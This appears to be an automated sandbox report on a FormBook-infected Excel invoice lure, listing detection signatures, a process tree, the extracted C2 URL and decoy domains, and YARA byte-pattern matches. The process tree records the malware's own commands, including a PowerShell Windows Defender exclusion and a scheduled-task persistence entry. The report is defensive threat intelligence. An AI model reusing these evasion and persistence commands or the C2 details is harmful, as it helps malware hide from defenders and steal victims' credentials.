Edit tour

Windows Analysis Report
PROFORMA INVOICE.xlsx

Overview

General Information

Sample Name:	PROFORMA INVOICE.xlsx
Analysis ID:	626593
MD5:	5b9ddbdf0a0af0788eeceeacec2f0295
SHA1:	77687d59abbd0b3c4eecc80abbe30d33a47e781c
SHA256:	e11f7d510b899e00e0cf10dc360400fd38f180e9c72f42c465c3a470075cd9ea
Tags:	VelvetSweatshopxlsx
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: File Dropped By EQNEDT32EXE

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Shellcode detected

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to download and execute PE files

Checks if the current process is being debugged

Drops PE files to the user directory

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality for execution timing, often used to detect debuggers

Searches the installation path of Mozilla Firefox

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Office Equation Editor has been started

Contains functionality to download and launch executables

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2816 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2212 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 1200 cmdline: "C:\Users\Public\vbc.exe" MD5: F7ECD12D134AAF3541396C78337CE672)

powershell.exe (PID: 2532 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

schtasks.exe (PID: 2452 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

vbc.exe (PID: 1072 cmdline: C:\Users\Public\vbc.exe MD5: F7ECD12D134AAF3541396C78337CE672)

explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

mstsc.exe (PID: 172 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)

firefox.exe (PID: 1720 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsjonesc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x24c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x24fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x32345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x31df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x32447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x325bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x259ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3106c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x26732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x37987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x38a9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x34809:$sqlite3step: 68 34 1C 7B E1 0x3491c:$sqlite3step: 68 34 1C 7B E1 0x34838:$sqlite3text: 68 38 2A 90 C5 0x3495d:$sqlite3text: 68 38 2A 90 C5 0x3484b:$sqlite3blob: 68 53 D8 7F 8C 0x34973:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xd8a78:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd8e12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103898:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x103c32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12d6b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12da52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe61b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x110fd5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13adf5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe5c61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x110a81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13a8a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe62b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1110d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aef7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe642f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11124f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13b06f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xd982a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10464a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x12e46a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xe8679:$sqlite3step: 68 34 1C 7B E1 0xe878c:$sqlite3step: 68 34 1C 7B E1 0x113499:$sqlite3step: 68 34 1C 7B E1 0x1135ac:$sqlite3step: 68 34 1C 7B E1 0x13d2b9:$sqlite3step: 68 34 1C 7B E1 0x13d3cc:$sqlite3step: 68 34 1C 7B E1 0xe86a8:$sqlite3text: 68 38 2A 90 C5 0xe87cd:$sqlite3text: 68 38 2A 90 C5 0x1134c8:$sqlite3text: 68 38 2A 90 C5 0x1135ed:$sqlite3text: 68 38 2A 90 C5 0x13d2e8:$sqlite3text: 68 38 2A 90 C5 0x13d40d:$sqlite3text: 68 38 2A 90 C5 0xe86bb:$sqlite3blob: 68 53 D8 7F 8C 0xe87e3:$sqlite3blob: 68 53 D8 7F 8C 0x1134db:$sqlite3blob: 68 53 D8 7F 8C 0x113603:$sqlite3blob: 68 53 D8 7F 8C 0x13d2fb:$sqlite3blob: 68 53 D8 7F 8C 0x13d423:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x65bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8809:$sqlite3step: 68 34 1C 7B E1 0x891c:$sqlite3step: 68 34 1C 7B E1 0x8838:$sqlite3text: 68 38 2A 90 C5 0x895d:$sqlite3text: 68 38 2A 90 C5 0x884b:$sqlite3blob: 68 53 D8 7F 8C 0x8973:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x65bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8809:$sqlite3step: 68 34 1C 7B E1 0x891c:$sqlite3step: 68 34 1C 7B E1 0x8838:$sqlite3text: 68 38 2A 90 C5 0x895d:$sqlite3text: 68 38 2A 90 C5 0x884b:$sqlite3blob: 68 53 D8 7F 8C 0x8973:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x24c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x24fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x32345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x31df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x32447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x325bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x259ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3106c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x26732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x37987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x38a9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x34809:$sqlite3step: 68 34 1C 7B E1 0x3491c:$sqlite3step: 68 34 1C 7B E1 0x34838:$sqlite3text: 68 38 2A 90 C5 0x3495d:$sqlite3text: 68 38 2A 90 C5 0x3484b:$sqlite3blob: 68 53 D8 7F 8C 0x34973:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 1200	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.vbc.exe.400000.9.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.0.vbc.exe.400000.9.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.0.vbc.exe.400000.9.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
